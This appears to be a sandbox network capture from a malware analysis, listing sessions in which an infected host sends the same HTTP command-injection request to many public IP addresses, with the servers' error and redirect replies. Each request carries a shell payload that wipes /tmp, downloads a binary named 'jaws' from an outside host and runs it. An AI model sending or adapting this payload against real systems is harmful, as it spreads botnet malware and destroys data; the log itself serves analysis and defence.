                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8192.168.2.2340722184.29.129.780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:49.999891996 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:50.159662008 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:23:50 GMT
                                                          Date: Tue, 02 Jan 2024 05:23:50 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 66 36 37 34 64 36 38 26 23 34 36 3b 31 37 30 34 31 37 33 30 33 30 26 23 34 36 3b 36 32 30 65 39 37 65 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;9f674d68&#46;1704173030&#46;620e97eb</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9192.168.2.2332926172.121.35.8080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:50.004339933 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10192.168.2.233636224.236.125.8480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:50.012962103 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:50.377222061 CET183INHTTP/1.1 505 HTTP Version Not Supported
                                                          Cache-Control: no-cache
                                                          Content-Length: 989
                                                          Content-Type: text/html
                                                          Connection: close
                                                          Server: debut/1.30
                                                          Pragma: no-cache
                                                          Jan 2, 2024 06:23:50.390863895 CET1001INData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 48 54 54 50 20 73 74 61 74 75 73 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 0a 7b 0a 6d 61 72 67 69 6e 2d 74 6f
                                                          Data Ascii: <html><head><title>HTTP status</title><style type="text/css">body{margin-top: 30px;margin-right: 5%;margin-left: 5%;background-color: #ffffff;color: #000000;font-family: serif;font-size: 12px;line-height: 150%;}.header{color:


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          11192.168.2.234250894.253.89.2480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:50.267160892 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:50.534512043 CET502INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jan 2024 05:19:07 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          12192.168.2.233863689.218.57.12880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:50.310616970 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:50.626481056 CET29INHTTP/1.1 200 OK
                                                          Jan 2, 2024 06:23:50.626537085 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                          Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          13192.168.2.235922491.215.216.4380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:50.494103909 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:50.760756016 CET404INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:23:50 GMT
                                                          Server: Apache
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          14192.168.2.236050267.212.162.8380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:51.361229897 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:51.504483938 CET913INHTTP/1.1 400 Bad Request
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 681
                                                          date: Tue, 02 Jan 2024 05:23:51 GMT
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          15192.168.2.234246463.195.193.24080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:51.372397900 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:51.527359962 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:23:51 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          16192.168.2.2360550104.107.28.1680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:51.391247988 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:51.553894997 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:23:51 GMT
                                                          Date: Tue, 02 Jan 2024 05:23:51 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 64 38 33 64 37 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 33 31 26 23 34 36 3b 66 32 36 61 33 36 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;2d83d717&#46;1704173031&#46;f26a361</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          17192.168.2.233383266.22.55.12980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:51.506025076 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:51.651031971 CET422INHTTP/1.1 301 Moved Permanently
                                                          Server: rdwr
                                                          Date: Tue, 02 Jan 2024 05:23:51 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 161
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 72 64 77 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>rdwr</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          18192.168.2.2355228220.134.218.24880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:51.508732080 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:51.800628901 CET103INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          19192.168.2.235304038.55.173.24480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:51.512012959 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:51.663023949 CET511INHTTP/1.1 302 Moved Temporarily
                                                          Date: Tue, 02 Jan 2024 05:23:51 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 138
                                                          Connection: close
                                                          Server: Nginx
                                                          Expires: 0
                                                          Pragma: no-cache
                                                          Cache-Control: no-cache
                                                          X-LANG: 1
                                                          X-Timezone: 0800
                                                          X-Timestamp: 1704173031
                                                          X-Arch: x86
                                                          X-Sysbit: x64
                                                          X-Enterprise: 0
                                                          X-Support-i18n: 0
                                                          X-Support-wifi: 0
                                                          Location: /login
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>Nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          20192.168.2.2336382173.61.119.7780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:51.529010057 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:51.700556040 CET161INHTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Accept-Ranges: bytes
                                                          Server: HFS 2.3m
                                                          Set-Cookie: HFS_SID_=0.837759754853323; path=/; HttpOnly
                                                          Jan 2, 2024 06:23:51.700623035 CET1286INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">... RAWR-Template - 0.1.3 (c) 2007-2010, RAWR-Designs, Some Rights
                                                          Jan 2, 2024 06:23:51.700634956 CET198INData Raw: 69 6e 4f 75 74 65 72 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 49 6e 6e 65 72 22 3e 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 49 6e 6e 65 72 31 22 3e 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 49 6e 6e 65 72 32 22 3e 3c 64 69 76 20 69 64 3d 22
                                                          Data Ascii: inOuter"><div id="mainInner"><div id="mainInner1"><div id="mainInner2"><div id="mainInner3"><div id="header"><div><div id="bCrumbs"><a href="/">lv_home</a>/lv_serverError/<br></
                                                          Jan 2, 2024 06:23:51.700656891 CET797INData Raw: 64 69 76 3e 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 6e 61 76 62 61 72 22 3e 0d 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 42 74 6e
                                                          Data Ascii: div></div></div><div id="content"><div id="navbar"><div id="backBtn"><a href="/"><span>lv_back</span></a></div></div><table cellspacing="0" cellpadding="0" border="0" width="100%"><tr><td width="100%" valign="to
                                                          Jan 2, 2024 06:23:52.151457071 CET1286INData Raw: 22 6f 66 66 22 3b 0d 0a 09 09 2f 2f 4c 61 6e 67 75 61 67 65 20 53 74 72 69 6e 67 73 0d 0a 09 09 76 61 72 20 6c 76 5f 68 69 64 65 54 69 74 6c 65 3d 22 6c 76 5f 68 69 64 65 54 69 74 6c 65 22 3b 0d 0a 09 09 76 61 72 20 6c 76 5f 73 68 6f 77 54 69 74
                                                          Data Ascii: "off";//Language Stringsvar lv_hideTitle="lv_hideTitle";var lv_showTitle="lv_showTitle";</script><noscript><style type="text/css">.hide{display:none}</style></noscript>...[if lte IE 6]><style type="text/css">#mainInner{wi


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          21192.168.2.2360990159.69.20.6080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:51.599205971 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:51.837491035 CET495INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:23:51 GMT
                                                          Server: Apache/2.4.57 (Debian)
                                                          Content-Length: 301
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.57 (Debian) Server at localhost Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
